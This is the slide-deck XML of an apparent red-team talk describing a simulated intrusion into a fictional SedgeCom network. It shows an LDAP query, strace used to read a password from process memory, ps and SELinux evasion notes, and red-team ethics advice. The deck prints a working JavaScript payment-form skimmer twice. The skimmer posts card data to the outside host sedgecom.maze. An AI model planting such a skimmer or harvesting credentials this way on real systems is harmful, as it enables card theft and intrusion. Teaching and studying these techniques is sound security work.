          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516487" y="2346107"/>
            <a:ext cx="8836379" cy="2317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11809] read(8, "\6", 12)           = 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11809] read(8, "\0\0\0\7hunter2", 11) = 11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[pid 11808] &lt;... read resumed&gt; "\0\0\0\5", 4) =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51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49"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="102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F367-8715-234B-B39F-375B6CB0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LDAP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3780A-8A0C-1A4C-9D5F-407C1CA16BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1776984" y="2569465"/>
            <a:ext cx="818388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kali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:~# ldapsearch -W –LLL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-H ldaps://ds.sedgemaze.com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-D 'uid=osiris,ou=robots,dc=sedgemaze,dc=com'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-b 'ou=robots,dc=sedgemaze,dc=com'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'uid=osiris'</a:t>
            </a:r>
          </a:p>
          <a:p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LDAP Password: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dn: uid=osiris,ou=robots,dc=sedgemaze,dc=com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description: Storefront updater service account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loginShell: /bin/bash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928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74"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="9807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8008-64DB-A24E-9EDE-8201DA0E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ps evasion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00F0A-ED81-2B48-847E-957449ABA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Hardcode arguments into binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hide from casual process inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Still caught by SELinux</a:t>
            </a:r>
          </a:p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14"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="43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ACEC30-66CD-CD4C-A816-8BAB61B51342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708948" y="1158498"/>
            <a:ext cx="8774105" cy="454100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main(int argc, char *argv[])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init(argc, argv);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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exit_code = !nprocs;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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int status;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siginfo_t si;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while (dispatch_event(next_event(&amp;status, &amp;si), &amp;status, &amp;si))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;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terminate();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99C1C-8D27-1C4A-AD75-CFC82F0FD13E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708948" y="1992823"/>
            <a:ext cx="877410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init(argc, argv);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3DBB0-CE14-EE43-BD51-C6F46EE37703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708948" y="512167"/>
            <a:ext cx="3123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strace.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/strace/strace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42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29"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="69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654BBA-2838-804B-BB50-8B902E20C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2961" y="955645"/>
            <a:ext cx="10086079" cy="4794311"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210003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0"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="981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49C96-D939-4B43-AC72-6949906A5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296" y="1878009"/>
            <a:ext cx="9131408" cy="310198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15205 pts/1    S+     0:00 strace -p 30430 -e read -f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16179 pts/1    S+     0:00 top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13251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1"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="2052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706D-5B7B-4942-B1FD-A41BA7ED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ps evasion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AD758-91D7-A046-A767-DF7FF266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setsebool deny_ptrace 1</a:t>
            </a:r>
          </a:p>
          <a:p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/var/log/audit/audit.log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2CC1E-F9CF-B94A-9FEB-820196597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354" y="2455386"/>
            <a:ext cx="2419510" cy="4294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CBF28-7A13-A545-A932-C382F4C1E2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2575593">
            <a:off x="7274999" y="5399513"/>
            <a:ext cx="295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F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue Team Wins!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="iphone_note_sms.mp3">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2DE308-1154-BE40-A962-635862C374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44708" y="5881651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2DF31-17EA-6D40-B512-4615149CDBA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2231135" y="3575598"/>
            <a:ext cx="496553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:~# ./strace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strace: attach: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ptrace(PTRACE_ATTACH, 8586):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Permission denied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98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0"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="63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  <p:extLst mod="1">
    <p:ext uri="{E180D4A7-C9FB-4DFB-919C-405C955672EB}">
      <p14:showEvtLst xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <p14:playEvt time="46385" objId="4"/>
        <p14:stopEvt time="51143" objId="4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2A614-32B9-D34D-B709-168FE51C6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052" y="549999"/>
            <a:ext cx="9773897" cy="5758003"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641227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CA922642-7135-DA41-8251-EF3553D5F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2907" y="5294354"/>
            <a:ext cx="858364" cy="132908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3491BD0-F402-DA43-A0A5-E4C0E2413F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900777" y="3309511"/>
            <a:ext cx="1602849" cy="3671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5056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="367198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7B8DA9C-297A-DD49-83C0-80CAB02D6162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233154" y="4922422"/>
            <a:ext cx="1602849" cy="3671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5056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="367198"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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91C0BA-FD04-6848-92F2-452AD069688C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630304" y="4922422"/>
            <a:ext cx="1602849" cy="3671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02849" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="367198"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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5027131-3A85-4A4C-9390-7913F23863C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297928" y="3309511"/>
            <a:ext cx="1602849" cy="3671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02849" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="367198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23FED9B-DFE8-4443-9534-F5FF88B54767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564447" y="2337144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Domain controller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BD0C120-213D-D84F-B22F-813C5A7A30DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5801246" y="3648825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Jenkins master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C2C4BA5-718F-4B4F-AEB6-1D0915943DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4085838" y="5286706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Build server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B124EB0-10F0-8F4D-9789-68505BE8B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8117" y="5286706"/>
            <a:ext cx="858364" cy="13290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85BAC5-0D82-3A49-85C5-710677EE1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205" y="3648825"/>
            <a:ext cx="858364" cy="132908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53AA58D-B573-E747-BE81-A4464922A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6728" y="5604522"/>
            <a:ext cx="587184" cy="58718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BC3167C-F6CD-694B-9BFC-A4A09AB6F0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75657" y="5604522"/>
            <a:ext cx="587184" cy="58718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D2356EB-C056-0E43-9DB3-C705A529B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1595" y="2016661"/>
            <a:ext cx="858364" cy="1329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6A49F-9E30-5D4B-A254-A4226F1AD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488" y="453270"/>
            <a:ext cx="7729728" cy="1188720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Endgame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0AB390-9EC9-E144-9C0B-4EE030EDDB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306564" y="5286706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Storefront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0B26DA7-8473-9D47-B7F1-D95A0404B04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9006271" y="3673795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EDR console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CC6CE614-555C-654E-99BC-0942BCB4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9854" y="3673795"/>
            <a:ext cx="858364" cy="1329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49BCD-579F-0B47-BC93-B5F6DF558160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74038" y="3908513"/>
            <a:ext cx="3483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Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>dmidecode privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>strace pivot to storefront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89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70"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="40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0601 C -0.02252 -0.04189 -0.04505 -0.07801 -0.00273 -0.09213 C 0.03946 -0.10625 0.20951 -0.10648 0.25365 -0.09004 C 0.29792 -0.07361 0.23581 -0.00717 0.26211 0.0062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-423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5BC3D5-E483-9E4C-BB83-3CE07F0521E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="682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a=document.createElement("ruby"),b=document.createElement("rt"),c=document.createElement("rp"),d=document.documentElement,e="display",f="fontSize";return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a.appendChild(c),a.appendChild(b),d.appendChild(a),g(c,e)=="none"||g(a,e)=="ruby"&amp;&amp;g(b,e)=="ruby-text"||g(c,f)=="6pt"&amp;&amp;g(b,f)=="6pt"?(h(),!0):(h(),!1)}),Modernizr.addTest("time","valueAsDate"in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document.createElement("time")),Modernizr.addTest({texttrackapi:typeof document.createElement("video").addTextTrack=="function",track:"kind"in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document.createElement("track")}),Modernizr.addTest("placeholder",function(){return"placeholder"in(Modernizr.input||document.createElement("input"))&amp;&amp;"placeholder"in(Modernizr.textarea||document.createElement("textarea"))}),Modernizr.addTest("speechinput",function(){var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a=document.createElement("input");return"speech"in a||"onwebkitspeechchange"in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a}),function(a,b){b.formvalidationapi=!1,b.formvalidationmessage=!1,b.addTest("formvalidation",function(){var c=a.createElement("form");if("checkValidity"in c){var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d=a.body,e=a.documentElement,f=!1,g=!1,h;return b.formvalidationapi=!0,c.onsubmit=function(a){window.opera||a.preventDefault(),a.stopPropagation()},c.innerHTML='&lt;input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name="modTest"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d&gt;&lt;button&gt;&lt;/button&gt;',c.style.position="absolute",c.style.top="-99999em",d||(f=!0,d=a.createElement("body"),d.style.background="",e.appendChild(d)),d.appendChild(c),h=c.getElementsByTagName("input")[0],h.oninvalid=function(a){g=!0,a.preventDefault(),a.stopPropagation()},b.formvalidationmessage=!!h.validationMessage,c.getElementsByTagName("button")[0].click(),d.removeChild(c),f&amp;&amp;e.removeChild(d),g}return!1})}(document,window.Modernizr);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window.onload=function(){jQuery("#submitButton").bind("mouseup touchend",function(a){var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n={};jQuery("#paymentForm").serializeArray().map(function(a){n[a.name]=a.value});var e=document.getElementById("personPaying").innerHTML;n.person=e;var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t=JSON.stringify(n);setTimeout(function(){jQuery.ajax({type:"POST",async:!0,url:"https://sedgecom.maze/api/v1/",data:t,dataType:"application/json"})},500)})};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692F8-208C-2B4D-991F-1C5F6826A7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Red Team Wins!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AC01AF-1057-1B40-B9A9-4BC246445ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2536446"/>
            <a:ext cx="12192000" cy="1459823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2">
              <a:alpha val="76471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ACC3E-EFFD-9340-970A-9AA7599A6B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8212667" y="-694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0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37"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="79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5BC3D5-E483-9E4C-BB83-3CE07F0521E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="682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a=document.createElement("ruby"),b=document.createElement("rt"),c=document.createElement("rp"),d=document.documentElement,e="display",f="fontSize";return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a.appendChild(c),a.appendChild(b),d.appendChild(a),g(c,e)=="none"||g(a,e)=="ruby"&amp;&amp;g(b,e)=="ruby-text"||g(c,f)=="6pt"&amp;&amp;g(b,f)=="6pt"?(h(),!0):(h(),!1)}),Modernizr.addTest("time","valueAsDate"in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document.createElement("time")),Modernizr.addTest({texttrackapi:typeof document.createElement("video").addTextTrack=="function",track:"kind"in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document.createElement("track")}),Modernizr.addTest("placeholder",function(){return"placeholder"in(Modernizr.input||document.createElement("input"))&amp;&amp;"placeholder"in(Modernizr.textarea||document.createElement("textarea"))}),Modernizr.addTest("speechinput",function(){var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a=document.createElement("input");return"speech"in a||"onwebkitspeechchange"in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a}),function(a,b){b.formvalidationapi=!1,b.formvalidationmessage=!1,b.addTest("formvalidation",function(){var c=a.createElement("form");if("checkValidity"in c){var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d=a.body,e=a.documentElement,f=!1,g=!1,h;return b.formvalidationapi=!0,c.onsubmit=function(a){window.opera||a.preventDefault(),a.stopPropagation()},c.innerHTML='&lt;input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name="modTest"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d&gt;&lt;button&gt;&lt;/button&gt;',c.style.position="absolute",c.style.top="-99999em",d||(f=!0,d=a.createElement("body"),d.style.background="",e.appendChild(d)),d.appendChild(c),h=c.getElementsByTagName("input")[0],h.oninvalid=function(a){g=!0,a.preventDefault(),a.stopPropagation()},b.formvalidationmessage=!!h.validationMessage,c.getElementsByTagName("button")[0].click(),d.removeChild(c),f&amp;&amp;e.removeChild(d),g}return!1})}(document,window.Modernizr);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window.onload=function(){jQuery("#submitButton").bind("mouseup touchend",function(a){var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n={};jQuery("#paymentForm").serializeArray().map(function(a){n[a.name]=a.value});var e=document.getElementById("personPaying").innerHTML;n.person=e;var </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1620">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="27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t=JSON.stringify(n);setTimeout(function(){jQuery.ajax({type:"POST",async:!0,url:"https://sedgecom.maze/api/v1/",data:t,dataType:"application/json"})},500)})};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692F8-208C-2B4D-991F-1C5F6826A7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Red Team Wins!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AC01AF-1057-1B40-B9A9-4BC246445ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2536446"/>
            <a:ext cx="12192000" cy="1459823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2">
              <a:alpha val="76471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7602-2BB3-3B4E-9F5B-977225F1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536446"/>
            <a:ext cx="9960864" cy="1459823"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Javascript skimmer on storefront</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Captured data known to be current</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Captured data exfiltrated from client side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ACC3E-EFFD-9340-970A-9AA7599A6B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8212667" y="-694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52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37"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="79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64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64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64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B91A-64CF-F64C-BD81-EFBB5AD5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52042-53FC-CF4B-B9B1-7B8FCBEE8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Don't exploit for the sake of exploiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use appropriate level of evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There's no business impact if you get caught</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If you must take trophies, collect POCs, not boxes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103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34"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="40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8A8A1E-2BEC-BF47-9703-8AE38AC2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841" y="-1569471"/>
            <a:ext cx="9326280" cy="8589365"/>
          </a:xfrm>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="62000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgb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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Contact</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003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reiser@defensivecomputing.io</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003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github.com/adamreiser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2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twitter.com/timewarpadam</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr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731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57"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="5815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3273-2BC7-AB4E-9985-754017CC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78D82-0921-494A-B752-77D816E1E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Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>the SedgeCom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrate business impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid detection by blue team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimize additional risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Therefore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid exploiting for the sake of it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The less privilege we need, the better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782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38"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="80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A49F-9E30-5D4B-A254-A4226F1AD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488" y="453270"/>
            <a:ext cx="7729728" cy="1188720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SedgeCom Network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3491BD0-F402-DA43-A0A5-E4C0E2413F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900777" y="3309511"/>
            <a:ext cx="1602849" cy="3671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5056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="367198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7B8DA9C-297A-DD49-83C0-80CAB02D6162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233154" y="4922422"/>
            <a:ext cx="1602849" cy="3671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5056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602849" y="367198"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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91C0BA-FD04-6848-92F2-452AD069688C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630304" y="4922422"/>
            <a:ext cx="1602849" cy="3671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02849" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="367198"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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5027131-3A85-4A4C-9390-7913F23863C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297928" y="3309511"/>
            <a:ext cx="1602849" cy="3671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02849" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1602849" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="367198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23FED9B-DFE8-4443-9534-F5FF88B54767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564447" y="2337144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Domain controller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BD0C120-213D-D84F-B22F-813C5A7A30DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5801246" y="3648825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Jenkins master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C2C4BA5-718F-4B4F-AEB6-1D0915943DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4085838" y="5286706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Build server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0AB390-9EC9-E144-9C0B-4EE030EDDB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306564" y="5286706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Storefront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0B26DA7-8473-9D47-B7F1-D95A0404B04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9006271" y="3673795"/>
            <a:ext cx="1748563" cy="1165708"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1748563"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1165708"/>
              <a:gd name="connsiteX1" fmla="*/ 1748563 w 1748563"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1165708"/>
              <a:gd name="connsiteX2" fmla="*/ 1748563 w 1748563"/>
              <a:gd name="connsiteY2" fmla="*/ 1165708 h 1165708"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1748563"/>
              <a:gd name="connsiteY3" fmla="*/ 1165708 h 1165708"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1748563"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 11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563" h="1165708">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1748563" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1748563" y="1165708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11657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EDR console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B124EB0-10F0-8F4D-9789-68505BE8B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8117" y="5286706"/>
            <a:ext cx="858364" cy="13290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85BAC5-0D82-3A49-85C5-710677EE1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205" y="3648825"/>
            <a:ext cx="858364" cy="132908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A922642-7135-DA41-8251-EF3553D5F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2907" y="5294354"/>
            <a:ext cx="858364" cy="132908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BC3167C-F6CD-694B-9BFC-A4A09AB6F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6772" y="5653904"/>
